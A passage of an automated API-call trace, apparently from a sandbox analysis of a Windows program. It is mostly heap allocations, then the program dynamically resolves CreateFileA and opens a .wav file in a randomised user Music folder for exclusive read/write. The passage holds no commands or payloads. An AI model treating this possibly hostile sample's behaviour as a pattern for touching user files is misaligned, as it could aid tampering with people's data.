(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.567] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.570] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd840 [0184.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0184.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.571] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0184.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0184.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0184.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.572] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0184.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0184.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0184.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x56) returned 0x8c4a48 [0184.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", cchWideChar=86, lpMultiByteStr=0x8c4a48, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpUsedDefaultChar=0x0) returned 86 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.574] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\lftuly5i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xac) returned 0x8e6d90 [0184.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x8e6d90, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav") returned 86 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 